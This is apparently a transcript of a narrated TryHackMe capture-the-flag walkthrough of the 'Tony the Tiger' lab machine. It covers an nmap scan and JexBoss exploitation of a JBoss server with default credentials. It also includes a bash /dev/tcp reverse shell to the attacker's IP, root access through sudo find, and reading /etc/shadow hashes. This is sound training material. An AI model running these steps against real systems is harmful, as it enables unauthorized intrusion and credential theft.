This is the Tony the Tiger walkthrough on TryHackMe. Started our machine. The IP address is 10.10.19.232. Okay, so we've also got our VPN running. Open VPN. That's all ready to go. We have connection. We've got our IP address up here, ton0. Okay, so we've deployed it. Yes. Read through this information. You'll find the answers to the next questions. What is a great IRL example object? It says it up here. Is it lamp? What acronym is possible resulting in serialization attack? DOS. And what lower level format objects get converted into byte streams? It says it here somewhere. Byte streams, yeah. Okay, so the next step is what service is running on port 8080. So we're going to do an nmat scan, which I've already done. I did nmap-a for the operating system and services running, and 10.10.19.232. If we go through, we can see we've got port 22 open, port 80, 1090, 1091, 1098, 1099, 4446, 5500, and 8080. So Apache Tomcat Coyote JSP engine 1.1. Apache, that's what the service is running on 8080. What's the name of the front end application running on 8080? We can see it's look down here. JBoss service. Okay. So the next part is to find Tony's flag. In order to do that, Tony's started Totally Unbiased blog. So if we log into the Tony's blog, log into the IP address of the machine, Tony's blog, and we have a look in here, Frosted Flakes. We read through this. We have a look here. If you read all that, there's a picture there. If you go back and read this one, there's a hint in here, I think. Yeah, hopefully you should enjoy my content almost as much as I enjoyed the last bowl of Frosted Flakes. I'm really shy though, so any photos I post must have a deeper meaning to them. But of course you wouldn't know, you're not me. So the photos have a deeper meaning, in other words. So let's have a look at the first photo. So if we right click on this one, save image, there's that, and save. Now if we check that out, just open a new tab here, be in the downloads folder, and we see we've got this JPEG file here. So if we do strings and DE, we use tab to autocomplete. And sure enough, THM, Tony sure loves frosted flakes. There's our flag in the strings. Okay. So we have a look back. We have a look back here. And the flag, yep, correct answer. Okay, so now, next part is exploiting the machine. It says to download this file here, but I had trouble getting this to work. So I found another way. Because it's JBoss, and we know it's 8080. So if we go to port 8080, and we got the JBoss, the red hat. And if we click on here, administration panel, we already logged in with the default credentials for JBoss, which was admin. Okay, so now we're logged into it. If we just go to the browser and we say JBoss exploit, and we have a look. GitHub, this one. And we see we can use this git clone and see it into the Jex box, install the required text, and then we can run the Python file with our target host and port 8080, and it should give us a shell into the machine. So what we do is we go to here, we copy that, which I've already done, so I'll go back out of it, go back in here. You can see I've already, if I go git clone, I've already downloaded it there, so it's there. JexBoss. So if we cd into JexBox, ls, we've got requires.txt. So the next part of it says we've got to pip install -r requires.txt, so we do that, which I've already done. Should be all good. And the next step is to Python JexBox .py -host and our target host IP and 8080 port. So if we do that, Python 2 JexBox, and we've got our machine IP, which was, we have a look back here, it's 10.10.19.232 and port 8080. So if we hit enter on that, and it's checking web console. Do you want to run this automatic exploitation admin console? Say yes. And successfully logged in, and we'll wait. Starting command shell. And we have a shell. Okay, so now if we start a listener in port 444, and we do bin bash, what is it again? It tells you up here what other techniques can you choose, like bin bash. So if we say bin bash dash I, arrow dev TCP connection, and our IP, our ton 0 IP 10.8.98.254, 10.8.98.254, and the port 8080, the 0 arrow, and 1 2 arrow and 1. So that should hopefully give us a connection. We'll look back here. Nope, nothing. Something's not right. Maybe you don't need that part. Fail to check for updates. Why isn't it working? What about Jack's remote? Try that. Jack's remote equals 10.8.98.254, and that's why it didn't work, because we've got 8080 there. Silly. It's supposed to be 444. And look, we have connection. So if we say ls, yeah, we have connection to the machine. So if we go cd home, ls, cd into jboss, there's a note there. So if we say cat the note, and we see, hey jboss, follow your email. I've tried to replicate these issues you're having with the system. However, I don't know what commands you executed. There is a file with histories ordered access. Oh, and I almost forgot, I've reset your password. And it gives you the password like a boss, so that means jboss's password is like a boss. Alright. And what about if we, so if we say su jboss, didn't work. It's because we've got to get a terminal on the machine. So do Python -c, actually Python 3 -c, we'll import pty dot spawn bracket bin bash, and there we go. So cinematic THM. So now if we say, so we know the password is like a boss. So if we su try and change to the user jboss, it's asking for the password, like boss. Yeah, now we're jboss. Okay. Let's see if there's any hidden files. Oh, we've got .jboss.txt. There's a hidden file. So if we cut that out, we see we've got the flag there, THM there. So if we go back here, we've done the exploit and find jboss's flag, which we've done, and there it is, THM50C. THM50C. Alright. Now we've got to escalate our privileges. So if we clear the screen, so we see what sudo privileges, permissions we've got on jboss, and we find we've got, you don't need a password for find. Okay, that's handy. So we go back here, we don't need that anymore, and we can GTFO bins. This is a handy tool to use for privilege escalation. So if we type in here find, and we want sudo, and we see we got sudo find, so if we copy that, if the binary is allowed to run as a super user by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privilege access. So we copied that, we know it's find, so if we just paste that in there, she should, and look, who am I? We are root. We have rooted the box. It's just a matter of finding the flag now. So if we go cd into the root folder, we see root.txt, cat root.txt. There's the flag, but it's base 64 encoded. Okay, so what if we go to the Hash's website. Not connecting. It's taking too long. Alright, anyway, we'll copy this. So let's open a new tab and we'll say echo, and we've already got it there from before, so base 64, there's the hash I found. And it gives you that. Alright, so if we do this again without the base 64, copy that, we'll do echo and copy that in there, and we'll grep base 64 dash D. Oh, that's not working. Oh, here we go. It's working now anyway. So, okay. So forget that. That didn't work. We want to copy that again. This is a handy tool to crack hashes. Hashes.com. Okay, put that in there. Oh, and it gives us this BC77. Alright, so if we're going to copy that again, we'll search again. See what else we can get out of this. Oh, there we go. ZXC VBNM 1, 2, 3, 4, 5, 6, 7, 8, 9. Alright. There's our flag. I think. Let's check that. Go to escalation. And we see ZXCV. Whoops. ZXCV and 1, 2, 3, 4, 8, 9. And correct answer. And that's about it. We've rooted the box. 100% complete. Okay, there's one more thing we can check. If we do cat ECT and we see all the users on the machine. We've got root user, we've got JBoss, but the passwords aren't in there, they're represented by the X. So if we say cat, they're in the shadow file. And there we go. We've got the root users hash there, and we've got JBosses and Tonys and Simnatic, all their hashes. Okay, so that's about it. Thank you.